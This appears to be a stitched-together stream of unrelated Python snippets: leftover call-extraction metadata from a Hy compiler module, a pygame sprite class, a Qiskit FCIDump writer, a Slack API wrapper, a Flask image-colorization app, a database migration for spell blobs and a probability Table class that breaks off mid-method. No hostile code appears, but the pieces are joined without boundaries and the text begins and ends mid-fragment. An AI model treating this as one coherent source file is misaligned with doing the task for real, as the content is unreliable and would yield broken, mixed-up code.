"sys.path.insert",
"ast.walk",
"hy._compat.wr_long",
"hy.errors.HyIOError",
"marshal.dump",
"os.path.splitext",
"io.open",
"hy.lex.tokenize",
"hy.compiler.hy_compile",
"hy.models.HyObject",
"hy.models.replace_hy_obj",
"os.path.abspath",
"os.stat",
"hy._compat.long_type"... | [((6603, 6625), 'sys.path.insert', 'sys.path.insert', (['(0)', '""""""'], {}), "(0, '')\n", (6618, 6625), False, 'import sys\n'), ((1839, 1859), 'hy.lex.tokenize', 'tokenize', (["(buf + '\\n')"], {}), "(buf + '\\n')\n", (1847, 1859), False, 'from hy.lex import tokenize, LexException\n'), ((3548, 3558), 'hy.models.HyObject', 'HyObject', ([], {}), '()\n', (3556, 3558), False, 'from hy.models import HyObject, replace_hy_obj\n'), ((3655, 3682), 'hy.models.replace_hy_obj', 'replace_hy_obj', (['hytree', 'foo'], {}), '(hytree, foo)\n', (3669, 3682), False, 'from hy.models import HyObject, replace_hy_obj\n'), ((3700, 3746), 'hy.compiler.hy_compile', 'hy_compile', (['hytree', 'module_name'], {'get_expr': '(True)'}), '(hytree, module_name, get_expr=True)\n', (3710, 3746), False, 'from hy.compiler import hy_compile, HyTypeError\n'), ((3814, 3828), 'ast.walk', 'ast.walk', (['_ast'], {}), '(_ast)\n', (3822, 3828), False, 'import ast\n'), ((3899, 3913), 'ast.walk', 'ast.walk', (['expr'], {}), '(expr)\n', (3907, 3913), False, 'import ast\n'), ((2704, 2731), 'imp.new_module', 'imp.new_module', (['module_name'], {}), '(module_name)\n', (2718, 2731), False, 'import imp\n'), ((3240, 3267), 'imp.new_module', 'imp.new_module', (['module_name'], {}), '(module_name)\n', (3254, 3267), False, 'import imp\n'), ((4243, 4259), 'io.open', 'open', (['fname', '"""U"""'], {}), "(fname, 'U')\n", (4247, 4259), False, 'from io import open\n'), ((4400, 4422), 'hy._compat.long_type', 'long_type', (['st.st_mtime'], {}), '(st.st_mtime)\n', (4409, 4422), False, 'from hy._compat import PY3, PY33, MAGIC, builtins, long_type, wr_long\n'), ((4792, 4814), 'hy._compat.wr_long', 'wr_long', (['fc', 'timestamp'], {}), '(fc, timestamp)\n', (4799, 4814), False, 'from hy._compat import PY3, PY33, MAGIC, builtins, long_type, wr_long\n'), ((4876, 4898), 'marshal.dump', 'marshal.dump', (['code', 'fc'], {}), '(code, fc)\n', (4888, 4898), False, 'import marshal\n'), ((1973, 2007), 'io.open', 'open', (['fpath', '"""r"""'], {'encoding': '"""utf-8"""'}), "(fpath, 'r', encoding='utf-8')\n", (1977, 2007), False, 'from io import open\n'), ((2103, 2145), 'hy.errors.HyIOError', 'HyIOError', (['e.errno', 'e.strerror', 'e.filename'], {}), '(e.errno, e.strerror, e.filename)\n', (2112, 2145), False, 'from hy.errors import HyIOError\n'), ((3050, 3084), 'sys.modules.pop', 'sys.modules.pop', (['module_name', 'None'], {}), '(module_name, None)\n', (3065, 3084), False, 'import sys\n'), ((4844, 4867), 'hy._compat.wr_long', 'wr_long', (['fc', 'st.st_size'], {}), '(fc, st.st_size)\n', (4851, 4867), False, 'from hy._compat import PY3, PY33, MAGIC, builtins, long_type, wr_long\n'), ((5179, 5199), 'os.path.abspath', 'os.path.abspath', (['pth'], {}), '(pth)\n', (5194, 5199), False, 'import os\n'), ((5280, 5309), 'os.path.exists', 'os.path.exists', (['composed_path'], {}), '(composed_path)\n', (5294, 5309), False, 'import os\n'), ((6213, 6233), 'os.path.abspath', 'os.path.abspath', (['pth'], {}), '(pth)\n', (6228, 6233), False, 'import os\n'), ((4365, 4379), 'os.stat', 'os.stat', (['fname'], {}), '(fname)\n', (4372, 4379), False, 'import os\n'), ((4508, 4531), 'os.path.splitext', 'os.path.splitext', (['fname'], {}), '(fname)\n', (4524, 4531), False, 'import os\n'), ((6344, 6373), 'os.path.exists', 'os.path.exists', (['composed_path'], {}), '(composed_path)\n', (6358, 6373), False, 'import os\n'), ((2913, 2930), 'io.open', 'open', (['fpath', '"""rt"""'], {}), "(fpath, 'rt')\n", (2917, 2930), False, 'from io import open\n')] |
import pygame as pg
class State(pg.sprite.Sprite):
def __init__(self,col,row):
super().__init__()
self.image=pg.Surface((50,50))
self.rect=self.image.get_rect()
self.pos=pg.Vector2(col,row)
self.set_pixcel_position()
def set_pixcel_position(self):
self.rect.x=self.pos.x*50
self.rect.y=self.pos.y*50
def change_with_policy(self,state_dict,policy): #policy={0:'up',1:'down'} etc
state=state_dict[(self.pos.x,self.pos.y)]['state']
optimal_action=policy[state]
self.image=pg.transform.scale(pg.image.load('./images/'+optimal_action+'.png'),(20,20))
| [
"pygame.image.load",
"pygame.Vector2",
"pygame.Surface"
] | [((130, 150), 'pygame.Surface', 'pg.Surface', (['(50, 50)'], {}), '((50, 50))\n', (140, 150), True, 'import pygame as pg\n'), ((207, 227), 'pygame.Vector2', 'pg.Vector2', (['col', 'row'], {}), '(col, row)\n', (217, 227), True, 'import pygame as pg\n'), ((599, 651), 'pygame.image.load', 'pg.image.load', (["('./images/' + optimal_action + '.png')"], {}), "('./images/' + optimal_action + '.png')\n", (612, 651), True, 'import pygame as pg\n')] |
# -*- coding: utf-8 -*-
# This code is part of Qiskit.
#
# (C) Copyright IBM 2020.
#
# This code is licensed under the Apache License, Version 2.0. You may
# obtain a copy of this license in the LICENSE.txt file in the root directory
# of this source tree or at http://www.apache.org/licenses/LICENSE-2.0.
#
# Any modifications or derivative works of this code must retain this
# copyright notice, and modified files need to carry a notice indicating
# that they have been altered from the originals.
"""FCIDump dumper."""
from typing import List, Optional
from io import TextIOWrapper
import itertools
import numpy as np
def dump(outpath: str, norb: int, nelec: int, hijs: List[float], hijkls: List[float], einact: float,
ms2: int = 0, orbsym: Optional[List[int]] = None, isym: int = 1
) -> None:
# pylint: disable=wrong-spelling-in-docstring
"""Generates a FCIDump output.
Args:
outpath: Path to the output file.
norb: The number of orbitals.
nelec: The number of electrons.
hijs: The pair of alpha and beta 1-electron integrals. The latter may be None.
hijkls: The triplet of alpha/alpha, beta/alpha and beta/beta 2-electron integrals. The
latter two may be None.
einact: The inactive energy.
ms2: 2*S, where S is the spin quantum number.
orbsym: A list of spatial symmetries of the orbitals.
isym: The spatial symmetry of the wave function.
"""
hij, hij_b = hijs
hijkl, hijkl_ba, hijkl_bb = hijkls
# assert that either all beta variables are None or all of them are not
assert all([h is None for h in [hij_b, hijkl_ba, hijkl_bb]]) \
or all([h is not None for h in [hij_b, hijkl_ba, hijkl_bb]])
assert norb == hij.shape[0] == hijkl.shape[0]
mos = range(norb)
with open(outpath, 'w') as outfile:
# print header
outfile.write('&FCI NORB={:4d},NELEC={:4d},MS2={:4d}\n'.format(norb, nelec, ms2))
if orbsym is None:
outfile.write(' ORBSYM=' + '1,'*norb + '\n')
else:
assert len(orbsym) == norb
outfile.write(' ORBSYM=' + ','.join(orbsym) + '\n')
outfile.write(' ISYM={:d},\n/&END\n'.format(isym))
# append 2e integrals
_dump_2e_ints(hijkl, mos, outfile)
if hijkl_ba is not None:
_dump_2e_ints(hijkl_ba.transpose(), mos, outfile, beta=1)
if hijkl_bb is not None:
_dump_2e_ints(hijkl_bb, mos, outfile, beta=2)
# append 1e integrals
_dump_1e_ints(hij, mos, outfile)
if hij_b is not None:
_dump_1e_ints(hij_b, mos, outfile, beta=True)
# TODO append MO energies (last three indices are 0)
# append inactive energy
_write_to_outfile(outfile, einact, (0, 0, 0, 0))
def _dump_1e_ints(hij: List[float], mos: List[int], outfile: TextIOWrapper,
beta: bool = False) -> None:
idx_offset = 1 if not beta else 1+len(mos)
hij_elements = set()
for i, j in itertools.product(mos, repeat=2):
if i == j:
_write_to_outfile(outfile, hij[i][j], (i+idx_offset, j+idx_offset, 0, 0))
continue
if (j, i) in hij_elements and np.isclose(hij[i][j], hij[j][i]):
continue
_write_to_outfile(outfile, hij[i][j], (i+idx_offset, j+idx_offset, 0, 0))
hij_elements.add((i, j))
def _dump_2e_ints(hijkl: List[float], mos: List[int], outfile: TextIOWrapper,
beta: int = 0) -> None:
idx_offsets = [1, 1]
for b in range(beta):
idx_offsets[1-b] += len(mos)
hijkl_elements = set()
# pylint: disable=invalid-name
for elem in itertools.product(mos, repeat=4):
if np.isclose(hijkl[elem], 0.0, atol=1e-14):
continue
if len(set(elem)) == 1:
_write_to_outfile(outfile, hijkl[elem], (*[e+idx_offsets[0] for e in elem[:2]],
*[e+idx_offsets[1] for e in elem[2:]]))
continue
if beta != 1 and elem[::-1] in hijkl_elements and \
np.isclose(hijkl[elem], hijkl[elem[::-1]]):
continue
bra_perms = set(itertools.permutations(elem[:2]))
ket_perms = set(itertools.permutations(elem[2:]))
if beta == 1:
permutations = itertools.product(bra_perms, ket_perms)
else:
permutations = itertools.chain(
itertools.product(bra_perms, ket_perms),
itertools.product(ket_perms, bra_perms)
)
for perm in {e1 + e2 for e1, e2 in permutations}:
if perm in hijkl_elements and np.isclose(hijkl[elem], hijkl[perm]):
break
else:
_write_to_outfile(outfile, hijkl[elem], (*[e+idx_offsets[0] for e in elem[:2]],
*[e+idx_offsets[1] for e in elem[2:]]))
hijkl_elements.add(elem)
def _write_to_outfile(outfile: str, value: float, indices: List[int]):
outfile.write('{:23.16E}{:4d}{:4d}{:4d}{:4d}\n'.format(value, *indices))
| [
"itertools.permutations",
"itertools.product",
"numpy.isclose"
] | [((3021, 3053), 'itertools.product', 'itertools.product', (['mos'], {'repeat': '(2)'}), '(mos, repeat=2)\n', (3038, 3053), False, 'import itertools\n'), ((3677, 3709), 'itertools.product', 'itertools.product', (['mos'], {'repeat': '(4)'}), '(mos, repeat=4)\n', (3694, 3709), False, 'import itertools\n'), ((3722, 3762), 'numpy.isclose', 'np.isclose', (['hijkl[elem]', '(0.0)'], {'atol': '(1e-14)'}), '(hijkl[elem], 0.0, atol=1e-14)\n', (3732, 3762), True, 'import numpy as np\n'), ((3219, 3251), 'numpy.isclose', 'np.isclose', (['hij[i][j]', 'hij[j][i]'], {}), '(hij[i][j], hij[j][i])\n', (3229, 3251), True, 'import numpy as np\n'), ((4099, 4141), 'numpy.isclose', 'np.isclose', (['hijkl[elem]', 'hijkl[elem[::-1]]'], {}), '(hijkl[elem], hijkl[elem[::-1]])\n', (4109, 4141), True, 'import numpy as np\n'), ((4188, 4220), 'itertools.permutations', 'itertools.permutations', (['elem[:2]'], {}), '(elem[:2])\n', (4210, 4220), False, 'import itertools\n'), ((4246, 4278), 'itertools.permutations', 'itertools.permutations', (['elem[2:]'], {}), '(elem[2:])\n', (4268, 4278), False, 'import itertools\n'), ((4329, 4368), 'itertools.product', 'itertools.product', (['bra_perms', 'ket_perms'], {}), '(bra_perms, ket_perms)\n', (4346, 4368), False, 'import itertools\n'), ((4443, 4482), 'itertools.product', 'itertools.product', (['bra_perms', 'ket_perms'], {}), '(bra_perms, ket_perms)\n', (4460, 4482), False, 'import itertools\n'), ((4500, 4539), 'itertools.product', 'itertools.product', (['ket_perms', 'bra_perms'], {}), '(ket_perms, bra_perms)\n', (4517, 4539), False, 'import itertools\n'), ((4654, 4690), 'numpy.isclose', 'np.isclose', (['hijkl[elem]', 'hijkl[perm]'], {}), '(hijkl[elem], hijkl[perm])\n', (4664, 4690), True, 'import numpy as np\n')] |
import os
import time
from parsons.etl.table import Table
from parsons.utilities.check_env import check
from slackclient import SlackClient
from slackclient.exceptions import SlackClientError
import requests
class Slack(object):
def __init__(self, api_key=None):
if api_key is None:
try:
self.api_key = os.environ["SLACK_API_TOKEN"]
except KeyError:
raise KeyError('Missing api_key. It must be passed as an '
'argument or stored as environmental variable')
else:
self.api_key = api_key
self.client = SlackClient(self.api_key)
def channels(self, fields=['id', 'name'], exclude_archived=False,
types=['public_channel']):
"""
Return a list of all channels in a Slack team.
`Args:`
fields: list
A list of the fields to return. By default, only the channel
`id` and `name` are returned. See
https://api.slack.com/methods/conversations.list for a full
list of available fields. `Notes:` nested fields are unpacked.
exclude_archived: bool
Set to `True` to exclude archived channels from the list.
Default is false.
types: list
Mix and match channel types by providing a list of any
combination of `public_channel`, `private_channel`,
`mpim` (aka group messages), or `im` (aka 1-1 messages).
`Returns:`
Parsons Table
See :ref:`parsons-table` for output options.
"""
tbl = self._paginate_request(
"conversations.list", "channels", types=types,
exclude_archived=exclude_archived)
tbl.unpack_dict("topic", include_original=False, prepend=True,
prepend_value="topic")
tbl.unpack_dict("purpose", include_original=False,
prepend=True, prepend_value="purpose")
rm_cols = [x for x in tbl.columns if x not in fields]
tbl.remove_column(*rm_cols)
return tbl
def users(self, fields=['id', 'name', 'deleted', 'profile_real_name_normalized',
'profile_email']):
"""
Return a list of all users in a Slack team.
`Args:`
fields: list
A list of the fields to return. By default, only the user
`id` and `name` and `deleted` status are returned. See
https://api.slack.com/methods/users.list for a full list of
available fields. `Notes:` nested fields are unpacked.
`Returns:`
Parsons Table
See :ref:`parsons-table` for output options.
"""
tbl = self._paginate_request("users.list", "members", include_locale=True)
tbl.unpack_dict("profile", include_original=False, prepend=True,
prepend_value="profile")
rm_cols = [x for x in tbl.columns if x not in fields]
tbl.remove_column(*rm_cols)
return tbl
@classmethod
def message(cls, channel, text, webhook=None, parent_message_id=None):
"""
Send a message to a Slack channel with a webhook instead of an api_key.
You might not have the full-access API key but still want to notify a channel
`Args:`
channel: str
The name or id of a `public_channel`, a `private_channel`, or
an `im` (aka 1-1 message).
text: str
Text of the message to send.
webhook: str
If you have a webhook url instead of an api_key
Looks like: https://<KEY>
parent_message_id: str
The `ts` value of the parent message. If used, this will thread the message.
"""
webhook = check('SLACK_API_WEBHOOK', webhook, optional=True)
payload = {'channel': channel, 'text': text}
if parent_message_id:
payload['thread_ts'] = parent_message_id
return requests.post(webhook, json=payload)
def message_channel(self, channel, text, as_user=False, parent_message_id=None):
"""
Send a message to a Slack channel
`Args:`
channel: str
The name or id of a `public_channel`, a `private_channel`, or
an `im` (aka 1-1 message).
text: str
Text of the message to send.
as_user: str
Pass true to post the message as the authenticated user,
instead of as a bot. Defaults to false. See
https://api.slack.com/methods/chat.postMessage#authorship for
more information about Slack authorship.
parent_message_id: str
The `ts` value of the parent message. If used, this will thread the message.
`Returns:`
`dict`:
A response json
"""
resp = self.client.api_call(
"chat.postMessage", channel=channel, text=text,
as_user=as_user, thread_ts=parent_message_id)
if not resp['ok']:
if resp['error'] == 'ratelimited':
time.sleep(int(resp['headers']['Retry-After']))
resp = self.client.api_call(
"chat.postMessage",
channel=channel, text=text, as_user=as_user)
raise SlackClientError(resp['error'])
return resp
def upload_file(self, channels, filename, filetype=None,
initial_comment=None, title=None, is_binary=False):
"""
Upload a file to Slack channel(s).
`Args:`
channels: list
The list of channel names or IDs where the file will be shared.
filename: str
The path to the file to be uploaded.
filetype: str
A file type identifier. If None, type will be inferred base on
file extension. This is used to determine what fields are
available for that object. See https://api.slack.com/types/file
for a list of valid types and for more information about the
file object.
initial_comment: str
The text of the message to send along with the file.
title: str
Title of the file to be uploaded.
is_binary: bool
If True, open this file in binary mode. This is needed if
uploading binary files. Defaults to False.
`Returns:`
`dict`:
A response json
"""
if filetype is None and '.' in filename:
filetype = filename.split('.')[-1]
mode = 'rb' if is_binary else 'r'
with open(filename, mode) as file_content:
resp = self.client.api_call(
"files.upload", channels=channels, file=file_content,
filetype=filetype, initial_comment=initial_comment,
title=title)
if not resp['ok']:
if resp['error'] == 'ratelimited':
time.sleep(int(resp['headers']['Retry-After']))
resp = self.client.api_call(
"files.upload", channels=channels, file=file_content,
filetype=filetype, initial_comment=initial_comment,
title=title)
raise SlackClientError(resp['error'])
return resp
def _paginate_request(self, endpoint, collection, **kwargs):
# The max object we're requesting at a time.
# This is an nternal limit to not overload slack api
LIMIT = 200
items = []
next_page = True
cursor = None
while next_page:
resp = self.client.api_call(
endpoint, cursor=cursor, limit=LIMIT, **kwargs)
if not resp['ok']:
if resp['error'] == 'ratelimited':
time.sleep(int(resp['headers']['Retry-After']))
continue
raise SlackClientError(resp['error'])
items.extend(resp[collection])
if resp["response_metadata"]["next_cursor"]:
cursor = resp["response_metadata"]["next_cursor"]
else:
next_page = False
return Table(items)
| [
"requests.post",
"slackclient.exceptions.SlackClientError",
"slackclient.SlackClient",
"parsons.etl.table.Table",
"parsons.utilities.check_env.check"
] | [((639, 664), 'slackclient.SlackClient', 'SlackClient', (['self.api_key'], {}), '(self.api_key)\n', (650, 664), False, 'from slackclient import SlackClient\n'), ((3936, 3986), 'parsons.utilities.check_env.check', 'check', (['"""SLACK_API_WEBHOOK"""', 'webhook'], {'optional': '(True)'}), "('SLACK_API_WEBHOOK', webhook, optional=True)\n", (3941, 3986), False, 'from parsons.utilities.check_env import check\n'), ((4138, 4174), 'requests.post', 'requests.post', (['webhook'], {'json': 'payload'}), '(webhook, json=payload)\n', (4151, 4174), False, 'import requests\n'), ((8479, 8491), 'parsons.etl.table.Table', 'Table', (['items'], {}), '(items)\n', (8484, 8491), False, 'from parsons.etl.table import Table\n'), ((5514, 5545), 'slackclient.exceptions.SlackClientError', 'SlackClientError', (["resp['error']"], {}), "(resp['error'])\n", (5530, 5545), False, 'from slackclient.exceptions import SlackClientError\n'), ((7557, 7588), 'slackclient.exceptions.SlackClientError', 'SlackClientError', (["resp['error']"], {}), "(resp['error'])\n", (7573, 7588), False, 'from slackclient.exceptions import SlackClientError\n'), ((8211, 8242), 'slackclient.exceptions.SlackClientError', 'SlackClientError', (["resp['error']"], {}), "(resp['error'])\n", (8227, 8242), False, 'from slackclient.exceptions import SlackClientError\n')] |
from flask import Flask, flash, request, redirect, url_for, render_template
from werkzeug.utils import secure_filename
import os
from keras.models import load_model
from keras.applications.inception_resnet_v2 import InceptionResNetV2
import tensorflow as tf
from skimage.io import imsave
from skimage.transform import resize
import numpy as np
from keras.preprocessing.image import ImageDataGenerator, array_to_img, img_to_array, load_img
from skimage.color import rgb2lab, lab2rgb, rgb2gray, gray2rgb
from keras.applications.inception_resnet_v2 import preprocess_input
from PIL import Image,ImageChops
import logging
global graph
graph = tf.get_default_graph()
app = Flask(__name__)
app.secret_key = "hello"
ALLOWED_EXTENSIONS = set(['png', 'jpg', 'jpeg'])
model = load_model('trained-model.h5')
UPLOAD_FOLDER = '/home/nubaf/Git-Projects/colorization/files'
app.config['UPLOAD_FOLDER'] = UPLOAD_FOLDER
files = [f for f in os.listdir('.') if os.path.isfile(f)]
checkInception = False
for f in files:
if f == "inception.h5":
checkInception = True
inception = load_model('inception.h5', compile=False)
break
if not checkInception:
inception = InceptionResNetV2(weights='imagenet', include_top=True)
inception.save('inception.h5')
inception.graph = graph
def create_inception_embedding(grayscaled_rgb):
grayscaled_rgb_resized = []
for i in grayscaled_rgb:
i = resize(i, (299, 299, 3), mode='constant')
grayscaled_rgb_resized.append(i)
grayscaled_rgb_resized = np.array(grayscaled_rgb_resized)
grayscaled_rgb_resized = preprocess_input(grayscaled_rgb_resized)
with graph.as_default():
embed = inception.predict(grayscaled_rgb_resized)
return embed
def allowed_file(filename):
return '.' in filename and \
filename.rsplit('.', 1)[1].lower() in ALLOWED_EXTENSIONS
@app.route('/', methods=['GET', 'POST'])
def upload_file():
if request.method == 'POST':
try:
url = request.form['url']
if 'examples' in url:
color_file = process(url)
return render_template('index.html', res='static/examples/girl.jpg')
# check if the post request has the file part
except:
logging.exception('')
if 'file' not in request.files:
flash('No file part')
return redirect(request.url)
file = request.files['file']
# if user does not select file, browser also
# submit an empty part without filename
if file.filename == '':
flash('No selected file')
return redirect(request.url)
if file and allowed_file(file.filename):
filename = secure_filename(file.filename)
file.save(os.path.join(app.config['UPLOAD_FOLDER'], filename))
color_file = process(file.filename)
return render_template('index.html', og=color_file[0], res=color_file[1])
return render_template('index.html')
def process(img):
if 'examples' in img:
im = Image.open(img)
name = img.split('.')[0].split('/')[-1]
else:
im = Image.open('files/' + img)
name = img.split('.')[0]
old_size = im.size # old_size[0] is in (width, height) format
ratio = float(256)/max(old_size)
new_size = tuple([int(x*ratio) for x in old_size])
im = im.resize(new_size, Image.ANTIALIAS)
new_im = Image.new("RGB", (256, 256))
new_im.paste(im, ((256-new_size[0])//2,(256-new_size[1])//2))
new_im.save('static/processed_png/' + name + ".png","PNG")
a = np.array(img_to_array(load_img('static/processed_png/' + name +'.png')))
a = a.reshape(1,256,256,3)
#gray_me = gray2rgb(rgb2gray(1.0/255*a))
color_me_embed = create_inception_embedding(a)
a = rgb2lab(1.0/255*a)[:,:,:,0]
a = a.reshape(a.shape+(1,))
with graph.as_default():
output = model.predict([a, color_me_embed])
output = output * 128
for i in range(len(output)):
cur = np.zeros((256, 256, 3))
cur[:,:,0] = a[i][:,:,0]
cur[:,:,1:] = output[i]
imsave(f'static/colored_img/{name}.png',(lab2rgb(cur)))
trim(Image.open(f'static/processed_png/{name}.png')).save(f'static/processed_png/{name}.png')
trim(Image.open(f'static/colored_img/{name}.png')).save(f'static/colored_img/{name}.png')
return (f'static/processed_png/{name}.png',f'static/colored_img/{name}.png')
def trim(im):
bg = Image.new(im.mode, im.size, im.getpixel((0,0)))
diff = ImageChops.difference(im, bg)
diff = ImageChops.add(diff, diff, 2.0, -100)
bbox = diff.getbbox()
if bbox:
return im.crop(bbox)
if __name__ == "__main__":
app.run(debug=True)
| [
"flask.render_template",
"flask.Flask",
"PIL.Image.new",
"logging.exception",
"numpy.array",
"werkzeug.utils.secure_filename",
"os.listdir",
"skimage.color.rgb2lab",
"flask.flash",
"keras.applications.inception_resnet_v2.preprocess_input",
"skimage.color.lab2rgb",
"keras.applications.inception... | [((642, 664), 'tensorflow.get_default_graph', 'tf.get_default_graph', ([], {}), '()\n', (662, 664), True, 'import tensorflow as tf\n'), ((671, 686), 'flask.Flask', 'Flask', (['__name__'], {}), '(__name__)\n', (676, 686), False, 'from flask import Flask, flash, request, redirect, url_for, render_template\n'), ((769, 799), 'keras.models.load_model', 'load_model', (['"""trained-model.h5"""'], {}), "('trained-model.h5')\n", (779, 799), False, 'from keras.models import load_model\n'), ((1176, 1231), 'keras.applications.inception_resnet_v2.InceptionResNetV2', 'InceptionResNetV2', ([], {'weights': '"""imagenet"""', 'include_top': '(True)'}), "(weights='imagenet', include_top=True)\n", (1193, 1231), False, 'from keras.applications.inception_resnet_v2 import InceptionResNetV2\n'), ((1526, 1558), 'numpy.array', 'np.array', (['grayscaled_rgb_resized'], {}), '(grayscaled_rgb_resized)\n', (1534, 1558), True, 'import numpy as np\n'), ((1588, 1628), 'keras.applications.inception_resnet_v2.preprocess_input', 'preprocess_input', (['grayscaled_rgb_resized'], {}), '(grayscaled_rgb_resized)\n', (1604, 1628), False, 'from keras.applications.inception_resnet_v2 import preprocess_input\n'), ((2969, 2998), 'flask.render_template', 'render_template', (['"""index.html"""'], {}), "('index.html')\n", (2984, 2998), False, 'from flask import Flask, flash, request, redirect, url_for, render_template\n'), ((3422, 3450), 'PIL.Image.new', 'Image.new', (['"""RGB"""', '(256, 256)'], {}), "('RGB', (256, 256))\n", (3431, 3450), False, 'from PIL import Image, ImageChops\n'), ((4569, 4598), 'PIL.ImageChops.difference', 'ImageChops.difference', (['im', 'bg'], {}), '(im, bg)\n', (4590, 4598), False, 'from PIL import Image, ImageChops\n'), ((4610, 4647), 'PIL.ImageChops.add', 'ImageChops.add', (['diff', 'diff', '(2.0)', '(-100)'], {}), '(diff, diff, 2.0, -100)\n', (4624, 4647), False, 'from PIL import Image, ImageChops\n'), ((926, 941), 'os.listdir', 'os.listdir', (['"""."""'], {}), "('.')\n", (936, 941), False, 'import os\n'), ((945, 962), 'os.path.isfile', 'os.path.isfile', (['f'], {}), '(f)\n', (959, 962), False, 'import os\n'), ((1081, 1122), 'keras.models.load_model', 'load_model', (['"""inception.h5"""'], {'compile': '(False)'}), "('inception.h5', compile=False)\n", (1091, 1122), False, 'from keras.models import load_model\n'), ((1414, 1455), 'skimage.transform.resize', 'resize', (['i', '(299, 299, 3)'], {'mode': '"""constant"""'}), "(i, (299, 299, 3), mode='constant')\n", (1420, 1455), False, 'from skimage.transform import resize\n'), ((3057, 3072), 'PIL.Image.open', 'Image.open', (['img'], {}), '(img)\n', (3067, 3072), False, 'from PIL import Image, ImageChops\n'), ((3144, 3170), 'PIL.Image.open', 'Image.open', (["('files/' + img)"], {}), "('files/' + img)\n", (3154, 3170), False, 'from PIL import Image, ImageChops\n'), ((3796, 3818), 'skimage.color.rgb2lab', 'rgb2lab', (['(1.0 / 255 * a)'], {}), '(1.0 / 255 * a)\n', (3803, 3818), False, 'from skimage.color import rgb2lab, lab2rgb, rgb2gray, gray2rgb\n'), ((2332, 2353), 'flask.flash', 'flash', (['"""No file part"""'], {}), "('No file part')\n", (2337, 2353), False, 'from flask import Flask, flash, request, redirect, url_for, render_template\n'), ((2373, 2394), 'flask.redirect', 'redirect', (['request.url'], {}), '(request.url)\n', (2381, 2394), False, 'from flask import Flask, flash, request, redirect, url_for, render_template\n'), ((2577, 2602), 'flask.flash', 'flash', (['"""No selected file"""'], {}), "('No selected file')\n", (2582, 2602), False, 'from flask import Flask, flash, request, redirect, url_for, render_template\n'), ((2622, 2643), 'flask.redirect', 'redirect', (['request.url'], {}), '(request.url)\n', (2630, 2643), False, 'from flask import Flask, flash, request, redirect, url_for, render_template\n'), ((2716, 2746), 'werkzeug.utils.secure_filename', 'secure_filename', (['file.filename'], {}), '(file.filename)\n', (2731, 2746), False, 'from werkzeug.utils import secure_filename\n'), ((2889, 2955), 'flask.render_template', 'render_template', (['"""index.html"""'], {'og': 'color_file[0]', 'res': 'color_file[1]'}), "('index.html', og=color_file[0], res=color_file[1])\n", (2904, 2955), False, 'from flask import Flask, flash, request, redirect, url_for, render_template\n'), ((3610, 3659), 'keras.preprocessing.image.load_img', 'load_img', (["('static/processed_png/' + name + '.png')"], {}), "('static/processed_png/' + name + '.png')\n", (3618, 3659), False, 'from keras.preprocessing.image import ImageDataGenerator, array_to_img, img_to_array, load_img\n'), ((4022, 4045), 'numpy.zeros', 'np.zeros', (['(256, 256, 3)'], {}), '((256, 256, 3))\n', (4030, 4045), True, 'import numpy as np\n'), ((2114, 2175), 'flask.render_template', 'render_template', (['"""index.html"""'], {'res': '"""static/examples/girl.jpg"""'}), "('index.html', res='static/examples/girl.jpg')\n", (2129, 2175), False, 'from flask import Flask, flash, request, redirect, url_for, render_template\n'), ((2258, 2279), 'logging.exception', 'logging.exception', (['""""""'], {}), "('')\n", (2275, 2279), False, 'import logging\n'), ((2769, 2820), 'os.path.join', 'os.path.join', (["app.config['UPLOAD_FOLDER']", 'filename'], {}), "(app.config['UPLOAD_FOLDER'], filename)\n", (2781, 2820), False, 'import os\n'), ((4172, 4184), 'skimage.color.lab2rgb', 'lab2rgb', (['cur'], {}), '(cur)\n', (4179, 4184), False, 'from skimage.color import rgb2lab, lab2rgb, rgb2gray, gray2rgb\n'), ((4204, 4250), 'PIL.Image.open', 'Image.open', (['f"""static/processed_png/{name}.png"""'], {}), "(f'static/processed_png/{name}.png')\n", (4214, 4250), False, 'from PIL import Image, ImageChops\n'), ((4310, 4354), 'PIL.Image.open', 'Image.open', (['f"""static/colored_img/{name}.png"""'], {}), "(f'static/colored_img/{name}.png')\n", (4320, 4354), False, 'from PIL import Image, ImageChops\n')] |
import utils
import mysql.connector
def migration_name():
return "Spell blobs to spell table"
def check_preconditions(cur):
cur.execute("SHOW TABLES LIKE 'char_spells';")
if not cur.fetchone():
raise Exception("char_spells table does not exist. Please run sql/char_spells.sql")
def needs_to_run(cur):
# ensure char_spells table is empty
cur.execute("SELECT count(*) FROM char_spells")
row = cur.fetchone()
if row[0] != 0:
return False
# ensure spells column exists
cur.execute("SHOW COLUMNS FROM chars LIKE 'spells';")
if not cur.fetchone():
return False
return True
def migrate(cur, db):
try:
spellLimit = 1024
cur.execute("SELECT charid, HEX(spells) as spells FROM chars")
rows = cur.fetchall()
for row in rows:
charId = row[0]
spells = row[1]
if spells != None and spells != "":
print("Migrating charid: %d" % charId)
spellId = 0
binary_spells = utils.blob_to_binary(spells)
for bit in binary_spells:
if bit == "1":
if spellId >= spellLimit:
print("Going over spell limit of %d, not adding %d" % (spellLimit, spellId))
else:
cur.execute("INSERT IGNORE INTO char_spells VALUES (%s, %s);", (charId, spellId))
# print("Added spell %d" % spellId)
spellId = spellId + 1
print(" [OK]")
else:
print("Charid %d has no spells, skipping" % charId)
db.commit()
except mysql.connector.Error as err:
print("Something went wrong: {}".format(err)) | [
"utils.blob_to_binary"
] | [((1051, 1079), 'utils.blob_to_binary', 'utils.blob_to_binary', (['spells'], {}), '(spells)\n', (1071, 1079), False, 'import utils\n')] |
from collections import ChainMap
from collections.abc import Mapping, Iterable
from itertools import groupby
from operator import itemgetter
import numpy as np
from probability import RowKey
from probability import TableColumns
# from probability.core_1 import RowKey
# from probability.core_1 import TableColumns
def to_dict(groupby_index, value_index):
def make_dict(sorted_items):
# It groups the sorted item based on
# the element as groupby_index
# and then sum the values at value_index
return {
k: sum([item[value_index] for item in g2])
for k, g2 in groupby(sorted_items, key=itemgetter(groupby_index))
}
return make_dict
class Table(dict):
def __init__(self, rows, names=None, _internal_=False, _children_names_=None):
if _internal_:
# rows are dictionary for internal calls
key_values = rows
try:
self._row_sample_ = next(iter(rows))
except StopIteration:
# Rows are empty
super().__init__(key_values)
self._row_sample_ = None
self.names = names
if _children_names_ is None:
self.children_names = []
self.columns = TableColumns(
names=names, children_names=[], table=self
)
else:
self.children_names = _children_names_
self.columns = TableColumns(
names=names, children_names=_children_names_, table=self
)
return
else:
if isinstance(rows, Mapping):
key_values = [(RowKey(k), value) for k, value in rows.items()]
elif isinstance(rows, Iterable):
key_values = [(RowKey(k), value) for k, value in rows]
else:
raise ValueError("Table expect rows as Mapping/Iterable")
self._row_sample_ = key_values[0][0]
if names is None:
names = [f"X{i+1}" for i, _ in enumerate(self._row_sample_)]
